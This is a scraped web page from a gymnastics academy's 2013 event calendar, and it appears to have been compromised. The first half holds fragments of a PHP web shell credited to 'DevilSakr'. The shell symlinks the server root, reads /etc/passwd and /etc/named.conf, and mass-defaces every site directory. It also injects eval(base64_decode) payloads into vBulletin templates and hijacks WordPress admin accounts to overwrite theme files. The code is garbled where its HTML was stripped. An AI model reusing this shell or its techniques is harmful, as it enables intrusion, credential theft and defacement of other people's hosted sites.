server ip :

your ip : ".$my_ip."
";?>

Web Shell By DevilSakr


';} elseif(isset($_GET['x']) && ($_GET['x'] == 'sym')){echo '
  
';} elseif(isset($_GET['x']) && ($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$op =@fopen ('sym/.htaccess','w');fwrite($op ,$htaccess);echo '

File Path:

Symlink Name




';$target = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink) {@symlink("$target","sym/$symfile");echo '
'.$symfile.'



';}} elseif(isset($_GET['x']) && ($_GET['x'] == 'sec')){$d0mains = @file("/etc/named.conf"); if($d0mains){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root"); $file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo ""; flush();$dcount++;}}}echo "
S. No.DomainsUsersSymlinkInformation
" . $dcount . "".$domains[1][0]."".$user['name']."Symlinkinfo
";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root"); $file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root"); $file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any ';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
";unlink("test.txt");} else echo "
Cannot create Symlink
";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')){error_reporting(0);?>

Mass Defacer


Folder :

File Name :

index URL :

";$dir=opendir("$mainpath");while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo "» $row/$file » Done

";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "


host :  | database :  | username :  | password :  | perfix :

";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$index = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo '$index';");$set_index .= "\'))}}{\${exit()}}";$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced

";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'wm')){ini_set("display_errors", "0");set_time_limit(0);@session_start();$base_path = dirname(__FILE__).'/';function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'k2',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error
";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible;MSIE 7.0b;Windows NT 5.1;.NET CLR 1.1.4322;Alexa Toolbar;.NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=k2&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Successful Login
";} else {$output.= "[+] Successful Login
";}$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php Opened
";}else {$output.= "[-] index.php Unable to open
";}$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".$content."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');$cond = 0;if($pos === false){$output.= "[-] index.php Failed
";} else {$output.= "[+] index.php Failed+
";$cond = 1;}} else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, $wr);@symlink('/','sym/root');$dominios = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);$out[1] = array_unique($out[1]);$numero_dominios = count($out[1]);echo "Total Websites: $numero_dominios

";$def = file_get_contents($def_url);$def = urlencode($def);$base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/sym/root/home/';$output = fopen('defaced.html', 'a+');$_SESSION['count1'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count1']) ? $_SESSION['count1'] :0 ) : 0;$_SESSION['count2'] = (isset($_GET['st']) && $_GET['st']!='') ? (isset($_SESSION['count2']) ? $_SESSION['count2'] :0 ) : 0;echo ' VGA - Calendar
logo VGA Header
 Search Event
By Title
By Venue



Browse Event Types
All Event Types
Printer Version 

Prev Year
Calendar Views : YearMonthWeekDay
Next Year

January 2013
SMTWTFS
  12345
6789101112
13141516171819
20212223242526
2728293031  
February 2013
SMTWTFS
     12
3456789
10111213141516
17181920212223
2425262728  
March 2013
SMTWTFS
     12
3456789
10111213141516
17181920212223
24252627282930
31      
April 2013
SMTWTFS
 123456
78910111213
14151617181920
21222324252627
282930    
May 2013
SMTWTFS
   1234
1:00 AM - 1:00 AM ss 
5
1:00 AM - 1:00 AM TAWWAT 
67891011
12
1:00 AM - 1:00 AM Micky 
13
1:00 AM - 1:00 AM Micky 
14
1:00 AM - 1:00 AM Micky 
15
1:00 AM - 1:00 AM Micky 
161718
19202122232425
262728293031 
June 2013
SMTWTFS
      1
2345678
9101112131415
16171819202122
23242526272829
30      
July 2013
SMTWTFS
 123456
78910111213
14151617181920
21222324252627
28293031   
August 2013
SMTWTFS
    123
45678910
11121314151617
18192021222324
25262728293031
September 2013
SMTWTFS
1234567
891011121314
15161718192021
22232425262728
2930     
October 2013
SMTWTFS
  12345
6789101112
13141516171819
20212223242526
2728293031  
November 2013
SMTWTFS
     12
3456789
10111213141516
17181920212223
24252627282930
December 2013
SMTWTFS
1234567
891011121314
15161718192021
22232425262728
293031    
Summer Camp
PreSchool Gymnastics
School Age Gymnastics
Urban Gymnastics
Tumbling
Gymnastics clinics
Competitive Team
Cheerleading
Parents Night Out
Daycare

 

Bookmark and Share

Check out our Pages:

facebook icon     twitter

usa gym member
© Victory Gymnastics Academy 2010
4863 Shawline | San Diego, CA 92111 | 858-650-FLIP | flip@victorygymnasticsacademy.com